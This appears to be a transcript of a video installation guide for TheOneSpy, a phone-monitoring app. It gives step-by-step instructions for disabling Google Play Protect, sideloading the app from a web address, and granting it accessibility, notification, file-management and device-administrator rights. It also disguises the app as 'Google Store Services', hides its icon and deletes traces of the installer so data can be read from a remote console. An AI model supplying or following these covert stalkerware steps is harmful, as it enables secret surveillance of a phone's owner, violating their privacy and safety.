Welcome to TheOneSpy, a complete installation guide. Open the Google Play Store. Tap on your account icon in the top right corner. Select Play Protect from the menu options. Tap on the settings icon in the top right corner. Turn off Scan Device for security threats and improve harmful app detection. Open any web browser. In the address bar, type the URL tosap.co and click on Enter. Please wait until the page fully load. Find the activation code field and input your activation code. Wait for a while. A pop-up will appear. Confidently press OK. Then, the application begins downloading. Once downloading is over, click to open and tap on Install. After installation, launch the app. Allow to permission dialogues. Now choose the language, then press on the Next. Tap on Allow to grant permission for Install Unknown Source. After permission, download the required app. Once downloaded, tap on Install. After installation, the new app will open automatically. Once the application opens, you will receive several permission dialogues. For each dialog, tap Allow while using the app or Allow All as appropriate. Enter the activation code to activate the app. Press the Allow button and click on Allow All the time. Allow to grant the management of all files permission. Tap on the Activate button to activate the device as an administrator. Disable app notifications by tapping on the Allow button. Android OS 13, 14, and 15, certain permissions like Device Notification Access and Accessibility Permission are disabled by default. To enable these permissions, select Google Store Services from the list. Click to enable and press OK. Tap the back button twice to return to the app installation process. Tap on the Allow button. Choose Google Store Services from the list, then tap on 3 dots in the top right corner and select Allow Restricted Settings. Enter your device password, then tap the back button twice to return to the app installation process. Grant Display Over App or Draw Over Other Apps permission by tapping on the Allow button. Grant Usage Access permission by tapping the Allow button. Select Google Store Services from the list. Then enable the Allow Permission switch. Notification access permission to the app by tapping on the Allow button. Then turn on the switch for Google Store Services. A dialog will appear. Tap on the Allow button. Grant accessibility permission by tapping on the Allow button. Find Google Store Services from the installed app list. Then turn on the permission switch for Google Store Services. If you want to hide the app, just click on OK. And you can also change the icon and name by your choice. After selecting the app name and icon, a dialog will appear asking, "Do you want to remove traces of this app?" Tap on Yes to delete the installer application and the downloaded APK file from the Downloads folder. Once the installation process is completed, you can monitor device data by visiting https://www.console.theonespy.com on any browser. Thanks for watching our TheOneSpy installation guide.